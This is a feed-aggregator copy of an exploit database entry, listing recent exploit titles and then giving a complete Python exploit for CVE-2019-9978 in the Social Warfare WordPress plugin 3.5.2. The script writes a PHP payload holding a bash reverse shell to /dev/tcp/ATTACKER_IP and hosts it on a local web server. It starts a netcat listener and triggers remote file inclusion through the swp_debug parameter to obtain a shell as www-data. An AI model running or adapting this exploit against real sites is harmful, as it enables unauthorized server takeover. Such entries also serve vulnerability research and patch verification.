惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

T
Threatpost
Exploit-DB.com RSS Feed
Exploit-DB.com RSS Feed
S
Security Affairs
N
News and Events Feed by Topic
T
Tenable Blog
P
Proofpoint News Feed
W
WeLiveSecurity
Simon Willison's Weblog
Simon Willison's Weblog
Google DeepMind News
Google DeepMind News
C
CERT Recently Published Vulnerability Notes
Help Net Security
Help Net Security
I
Intezer
T
Threat Research - Cisco Blogs
S
Secure Thoughts
C
Cyber Attacks, Cyber Crime and Cyber Security
L
Lohrmann on Cybersecurity
AWS News Blog
AWS News Blog
Google Online Security Blog
Google Online Security Blog
cs.AI updates on arXiv.org
cs.AI updates on arXiv.org
Know Your Adversary
Know Your Adversary
Project Zero
Project Zero
The Hacker News
The Hacker News
Security Archives - TechRepublic
Security Archives - TechRepublic
T
Tor Project blog
N
News | PayPal Newsroom
cs.CL updates on arXiv.org
cs.CL updates on arXiv.org
Hacker News - Newest:
Hacker News - Newest: "LLM"
A
Arctic Wolf
Forbes - Security
Forbes - Security
O
OpenAI News
K
KPMG report finds enterprise disconnect between AI and its ROI | CIO
Security Latest
Security Latest
P
Palo Alto Networks Blog
S
Schneier on Security
S
Securelist
C
Cybersecurity and Infrastructure Security Agency CISA
H
Heimdal Security Blog
V
Vulnerabilities – Threatpost
www.infosecurity-magazine.com
www.infosecurity-magazine.com
博客园_首页
T
Troy Hunt's Blog
Latest news
Latest news
Recent Announcements
Recent Announcements
MyScale Blog
MyScale Blog
人人都是产品经理
人人都是产品经理
L
LINUX DO - 热门话题
M
MIT News - Artificial intelligence
N
Netflix TechBlog - Medium
V
Visual Studio Blog
H
Hacker News: Front Page

The Exploit Database - CXSecurity.com

XenForo XSS CVE Scanner — Passive Detection Tool for CVE-2026-35055, CVE-2026-35054, CVE-2026-35057 ePati Antikor NGFW 2.0.1301 Authentication Bypass Apache HTTP Server 2.4.66 mod_http2 Double-Free Denial of Service NiceGUI 3.6.1 Path Traversal - CXSecurity.com Green Hills INTEGRITY RTOS IPCOMShell TELNET Format String Vulnerability - Realistic Full Chain Attack on F-16 Avionics (Ground Maintenance Scenario) OpenClaw < 2026.3.28 Discord Text Approval Authorization Bypass Kanboard <= 1.2.50 Authenticated SQL Injection OpenClaw tools.exec.safeBins <= 2026.2.22 Remote Code Execution Google Chrome < 145.0.7632.75 - CSSFontFeatureValuesMap Use-After-Free Siklu EtherHaul Series EH-8010 Remote Command Execution aiohttp 3.9.1 Directory Traversal - CXSecurity.com deephas <= 1.0.7 - Prototype Pollution leading to Arbitrary Code Execution / DoS LangChain Core - Serialization Injection to Jinja2 SSTI/RCE AVideo Notify.ffmpeg.json.php Unauthenticated Remote Code Execution Birth Chart Compatibility WordPress Plugin 2.0 Full Path Disclosure dotCMS 25.07.02-1 Authenticated Blind SQL Injection Mbed TLS 3.6.4 Use-After-Free - CXSecurity.com MonstaFTP Unauthenticated File Upload - CXSecurity.com Flowise 3.0.4 Remote Code Execution Swagger UI 1.0.3 Cross-Site Scripting (XSS) Vvveb CMS 1.0.5 Remote Code Execution SugarCRM unauthenticated Remote Code Execution (RCE) Belkin F9K1009 F9K1010 2.00.04/2.00.09 Hard Coded Credentials Commvault CLI Argument Injection / Traversal / Remote Code Execution Sitecore XP Post-Authentication File Upload Ultimate Member WordPress Plugin 2.6.6 Privilege Escalation Ghost CMS 5.59.1 Arbitrary File Read DOS Baby POP3 Server 1.04 Tenda AC20 16.03.08.12 Command Injection Projectworlds Online Admission System 1.0 SQL Injection JetBrains TeamCity 2023.11.4 Authentication Bypass Cisco ISE 3.0 Remote Code Execution Pandora ITSM Authenticated Command Injection Shenzhen Aitemi M300 Wi-Fi Repeater Unauthenticated RCE Malicious XDG Desktop File - CXSecurity.com Langflow 1.2.x Remote Code Execution (RCE) Microsoft Excel LTSC 2024 Remote Code Execution Adobe ColdFusion 2023.6 Remote File Read Malicious Windows Registration Entries (.reg) File Microsoft PowerPoint 2019 Remote Code Execution (RCE) Discourse 3.2.x Anonymous Cache Poisoning VBA Bypass Windows Defender Exploit PoC PHP CGI Module 8.3.4 Remote Code Execution Grandstream GSD3710 1.0.11.13 Stack Overflow Parrot and DJI variants Drone OSes Kernel Panic Exploit
Social Warfare WordPress Plugin 3.5.2 Remote Code Execution (RCE)
2025-07-01 · via The Exploit Database - CXSecurity.com

Social Warfare WordPress Plugin 3.5.2 Remote Code Execution (RCE)

CVSS Base Score: 4.3/10

Impact Subscore: 2.9/10

Exploitability Subscore: 8.6/10

Exploit range: Remote

Attack complexity: Medium

Authentication: No required

Confidentiality impact: None

Integrity impact: Partial

Availability impact: None

#!/usr/bin/env python3 # Exploit Title: Social Warfare WordPress Plugin 3.5.2 - Remote Code Execution (RCE) # Date: 25-06-2025 # Exploit Author: Huseyin Mardini (@housma) # Original Researcher: Luka Sikic # Original Exploit Author: hash3liZer # Vendor Homepage: https://wordpress.org/plugins/social-warfare/ # Software Link: https://downloads.wordpress.org/plugin/social-warfare.3.5.2.zip # Version: <= 3.5.2 # CVE: CVE-2019-9978 # Tested On: WordPress 5.1.1 with Social Warfare 3.5.2 (on Ubuntu 20.04) # Python Version: Python 3.x # Reference: https://www.exploit-db.com/exploits/46794 # Github (original PoC): https://github.com/hash3liZer/CVE-2019-9978 # The currently listed exploit for *CVE-2019-9978* (Exploit ID 46794<https://www.exploit-db.com/exploits/46794>) appears to no longer work as intended in many modern environments # Usage: # 1. Edit the config section below and replace `ATTACKER_IP` with your machine's IP. # 2. Run the script: `python3 exploit.py` # 3. It will: # - Create a PHP payload and save it as `payload.txt` (or any filename you set in PAYLOAD_FILE) # - Start an HTTP server on `HTTP_PORT` to host the payload # - Start a Netcat listener on `LISTEN_PORT` # - Trigger the vulnerability via the vulnerable `swp_debug` parameter # 4. On success, you get a reverse shell as `www-data`. # # Note: # - PAYLOAD_FILE defines only the name of the file to be created and served. # - Make sure ports 8001 and 4444 are open and not in use. import requests import threading import http.server import socketserver import os import subprocess import time # --- Config --- TARGET_URL = "http://example.com" ATTACKER_IP = "xxx.xxx.xx.xx" # Change to your attack box IP HTTP_PORT = 8000 LISTEN_PORT = 4444 PAYLOAD_FILE = "payload.txt" def create_payload(): """Write exact reverse shell payload using valid PHP syntax""" payload = f'<pre>system("bash -c \\"bash -i >& /dev/tcp/{ATTACKER_IP}/{LISTEN_PORT} 0>&1\\"")</pre>' with open(PAYLOAD_FILE, "w") as f: f.write(payload) print(f"[+] Payload written to {PAYLOAD_FILE}") def start_http_server(): """Serve payload over HTTP""" handler = http.server.SimpleHTTPRequestHandler with socketserver.TCPServer(("", HTTP_PORT), handler) as httpd: print(f"[+] HTTP server running at port {HTTP_PORT}") httpd.serve_forever() def start_listener(): """Start Netcat listener""" print(f"[+] Listening on port {LISTEN_PORT} for reverse shell...") subprocess.call(["nc", "-lvnp", str(LISTEN_PORT)]) def send_exploit(): """Trigger the exploit with vulnerable parameter""" payload_url = f"http://{ATTACKER_IP}:{HTTP_PORT}/{PAYLOAD_FILE}" exploit = f"{TARGET_URL}/wp-admin/admin-post.php?swp_debug=load_options&swp_url={payload_url}" print(f"[+] Sending exploit: {exploit}") try: requests.get(exploit, timeout=5) except requests.exceptions.RequestException: pass def main(): create_payload() # Start web server in background http_thread = threading.Thread(target=start_http_server, daemon=True) http_thread.start() time.sleep(2) # Give server time to start # Start listener in background listener_thread = threading.Thread(target=start_listener) listener_thread.start() time.sleep(1) # Send the malicious request send_exploit() if __name__ == "__main__": try: main() except KeyboardInterrupt: print("[-] Interrupted by user.")



 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

{{ x.nick }}

|

Date:

{{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1


{{ x.comment }}